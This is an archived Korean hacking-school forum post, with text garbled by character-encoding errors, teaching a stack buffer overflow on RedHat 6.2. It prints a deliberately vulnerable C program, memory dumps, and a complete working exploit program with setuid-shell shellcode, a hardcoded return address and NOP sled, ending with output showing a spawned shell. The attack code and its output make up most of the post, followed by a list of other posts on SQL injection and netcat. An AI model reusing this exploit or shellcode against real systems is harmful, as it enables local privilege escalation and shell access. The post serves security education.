1581, 8/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   buff3r
   http://#include .
   [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â -The Second -

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1438 [º¹»ç]


Àú¹ø¿¡ ¸¸µé¾ú´ø ÀͽºÇ÷ÎÀÕÀº Ãë¾àÇÑ ÇÁ·Î±×·¥ ³»ºÎ ¹öÆ۾ȿ¡¼­
¸ðµçÀÏÀ» ³¡³Â½À´Ï´Ù. À̹ø¿¡´Â buf ¿¡ 4¹ÙÀÌÆ® ¸¸À» ÇÒ´çÇÏ´Â ÇÁ·Î±×·¥À» ÀͽºÇ÷ÎÀÕ
Çغ¸µµ·Ï ÇÏ°Ú½À´Ï´Ù
vuln.c
#include <stdio.h>
#include "dumpcode.h"
int main(int argc,char *argv[])
{
        char buf[4];  // 4¹ÙÀÌÆ®¸¸À» ÇÒ´çÇÕ´Ï´Ù.
                                 // STACK ±¸Á¶ [buf(4)][sfp(4)[ret(4)]
                                 // ¿ì¸®°¡ ÀÌ¿ëÇÒ¼ö Àִ°ø°£Àº 8Byte ÀÔ´Ï´Ù.
                                 // Àú¹ø°ú °°Àº ¹æ¹ýÀ¸·Î´Â ÀͽºÇ÷ÎÀÕÀÌ ºÒ°¡´ÉÇÕ´Ï´Ù.
        strcpy(buf,argv[1]);
        dumpcode(buf,500);
}

±×·¸´Ù¸é ¾î¶»°Ô °ø°ÝÀ» ¼º°ø½ÃÄÑ¾ß ÇÒ±î¿ä . ? ¹æ¹ýÀº µÎ°¡Áö°¡ ÀÖ½À´Ï´Ù.
1. ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ exploit
2. NOP À» ÀÌ¿ëÇÑ exploit
(RTL Àº ÀÏ´Ü »¯½À´Ï´Ù .. ¤»¤»)
À̹ø °­Á¿¡¼­´Â 2¹ø° ¹æ¹ýÀ» ÀÌ¿ëÇÏ°Ú½À´Ï´Ù.
8¹ÙÀÌÆ® ¹Û¿¡ ¾ø´Âµ¥ ¾î¶»°Ô NOPÀ» ³Ö³Ä±¸¿ä ??
¹æ¹ýÀº °£´ÜÇÕ´Ï´Ù. ret µÚ¿¡ NOP °ú ½©Äڵ带 ³Ö¾îÁØÈÄ, ret´Â NOPÁß ¾Æ¹«°÷À̳ª
°¡¸£Å°°Ô ÇϸéµË´Ï´Ù.
°ø°ÝÇÒ ½ºÅñ¸Á¶:
[¾²·¹±â°ª ( 8Byte ) ][ RET ( 8Bye ] [ NOP x 200 ( 200byte) ] [Shellcode ]
                            --------------               ¡è
                                    ¡é                      ¡è
                                    ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ

ÀÌ·±½ÄÀ¸·Î ±¸¼ºÇÏ¸é µË´Ï´Ù.
ÀÏ´Ü ret µÚ¿¡ NOPÀÌ PUSH µÉ ÁÖ¼Ò¸¦ ã¾Æº¾½Ã´Ù.
[test@localhost test]$ ./vuln `perl -e 'print "\x90"x600'`
0xbffff904  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff914  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff924  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff934  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff944  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff954  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff964  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff974  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff984  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff994  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9b4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9c4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9d4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa04  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa14  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa24  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa34  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa44  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa54  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa64  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa74  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa84  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa94  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaa4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffab4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffac4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffad4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffae4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaf4  90 90 90 90                    

°ø°£ÀÌ Âü ¹«±Ã¹«Áø Çϱº¿ä +-+
¿ì¸®´Â 0xbffff924 ¸¦ ÀÌ¿ëÇսô٠.
ex.c
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;
        ret = 0xbffff924;  // ¿ì¸®°¡ ÀÌ¿ëÇÒ RET °ª
        buffer = malloc(600);
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; }  // ¸ðµç 600 byte¸¦ ret·Î µ¤¾î¾´´Ù
        for(i=0; i < 8; i++)
        { buffer[i] = '\x41'; } // óÀ½ 8 ¹ÙÀÌÆ®¸¦ \x41 (A) ·Î µ¤¾î¾´´Ù.
        ptr = buffer + 12; // ½ºÅà ¸ð½ÀÀÌ [A x 8 (8byte)][RET ( 4byte)] À̹ǷÎ
                                 // NOPÀº ret µÚÀÎ buffer + 12 ºÎÅÍ µ¤¾î¾´´Ù.
        for(i=0; i < 200; i++)
        { *(ptr++) = '\x90'; }   // NOP µ¤¾î¾²±â
        ptr = buffer + 212; // ½©Äڵ尡 À§Ä¡ÇÒ ºÎºÐ
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }   // RET , NOP µÚ¿¡ ½©Äڵ带 µ¤¾î¾´´Ù.

        buffer[600-1] = 0;        
        execl("./vuln", "vuln", buffer, 0);                      // ½ÇÇà
        free(buffer);
        return 0;
}
°ø°ÝÇϱâÀü :
[test@localhost test]$ ps
  PID TTY          TIME CMD
  681 pts/0    00:00:00 bash
  732 pts/0    00:00:00 bash2
  741 pts/0    00:00:00 ps

°ø°Ý :
[test@localhost test]$ ./ex
0xbffff8d4  41 41 41 41 41 41 41 41 24 f9 ff bf 90 90 90 90   AAAAAAAA$.......
0xbffff8e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff8f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff904  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff914  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff924  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff934  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff944  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff954  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff964  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff974  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff984  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff994  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a4  90 90 90 90 31 c0 b0 46 31 db 31 c9 cd 80 eb 16   ....1..F1.1.....
0xbffff9b4  5b 31 c0 88 43 07 89 5b 08 89 43 0c b0 0b 8d 4b   [1..C..[..C....K
0xbffff9c4  08 8d 53 0c cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f   ..S......../bin/
0xbffff9d4  73 68 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   sh..$...$...$...
0xbffff9e4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffff9f4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa04  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa14  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa24  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa34  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa44  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa54  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa64  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa74  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa84  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa94  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffaa4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffab4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffac4  24 f9 ff bf                                       $...
bash$
°ø°Ý ÇÏ°í³­ ÈÄ :
bash$ ps
  PID TTY          TIME CMD
  681 pts/0    00:00:00 bash
  732 pts/0    00:00:00 bash2
  739 pts/0    00:00:00 sh // °ø°ÝÀÌ ¼º°øÇߴٴ°ÍÀ» ¾Ë¼öÀÖ´Ù
  740 pts/0    00:00:00 ps


  Hit : 7649     Date : 2010/03/18 06:55



    
º°ºûÀ»´ã¾Æ ¿©·¯ºÐÀº Áö±Ý buff3r°¡ ¹öÆÛ¸¦ °¡Áö°í ³î°í ÀÖ´Â ±¤°æÀ» º¸°í °è½Ê´Ï´Ù.

¿©Æ° ¼±´ñ±Û ÈÄ°¨»ó
2010/03/18  
ÃÊÄÝ·¿³ªÀÎ ¹öÆÛ°¡ ¹öÆÛ¸¦ °¡Áö°í ³î°íÀÖ´Â ±¤°æ¤»¤»¤» 2010/03/18  
kjwon15 NOP À» °¡Áö°í ³ë´Â ±¤°æÀ̱º¿ä.. 2010/03/23  
zzguswhd ¾î¶².. ÄÄÆÄÀÏ·¯¸¦ ¾´°Å¿¡¿ä ?; 2010/07/26  
Cpgroot ÁÁÀºÁ¤º¸ µè°í°¨ ..¤·¤µ¤· 2010/08/18  
1441   letmein ´Ô ÇØÄ· Àü±îÁö Ç®¸é µÈ´Ù°í Çß´ø ¹®Á¦¿ä     blueh4g
02/03 7014
1440   ÇØÅ·¹æ¹ý[12]     bongcheur
07/07 13288
1439   ÄÄÇ»ÅÍÇØÄ¿[4]     bongcheur
07/07 9449
1438   Windows NetBios ¸¦ ¾Ç¿ëÇÑ ÇØÅ·¹æ¹ýÀÇ ¿¹¿Í ´ëó¹æ¹ý[3]     bongcheur
07/07 10859
1437   Å°º¸µåÇØÅ·(º¸¾È)¿¡ ´ëÇØ     bongcheur
07/07 7652
1436   nProtect Å°º¸µå ÇØÅ·¹æÁö ÇÁ·Î±×·¥ ¼³Ä¡[5]     bongcheur
07/07 10388
1435   ÇØÅ·Åø[5]     bongcheur
07/08 10513
1434   ¿ø°ÝÁ¾·á....[39]     bsjzzz
01/02 11903
1433   ¸®´ª½º ¹æÈ­º®ÀÇ Á¾·ù...[4]     bsjzzz
01/12 13938
1432   Á¦°¡ Á÷Á¢ ÀÛ¼ºÇÑ Sql Injection ¹®¼­ÀÔ´Ï´Ù .[9]     buff3r
10/29 8061
1431   [ÀÚÀÛ]°£´ÜÈ÷ NetcatÀ» ÀÌ¿ëÇÏ¿© À©µµ¿ìXP °®°í³î±â[11]     buff3r
01/03 8104
1430   Start of SQL Injection (¸Å¿ì ±âÃÊ) 1[6]     buff3r
01/11 7852
1429   Ready to Make a Sql injection tool[5]     buff3r
01/15 7739
1428   [BASE]Making SQL injection tool 1/3[3]     buff3r
01/20 6907
1427   [BT4_han.iso]USBºÎÆÃÇÏ´Â ¹æ¹ý For º°ºûÀ»´ã¾Æ[5]     buff3r
02/22 10175
1426   [ÀÚÀÛ] M4k3 Xploits :D[2]     buff3r
03/06 6951
1425   [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â[6]     buff3r
03/17 13253
  [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â -The Second -[5]     buff3r
03/18 7648
1423   Fedora Core 3 local based buffer overflow[3]     buff3r
08/22 7530
1422   ;cat À» »ç¿ëÇÏ´Â ÀÌÀ¯ .[3]     bugfixer2
05/18 10464
[1][2][3][4][5][6][7] 8 [9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org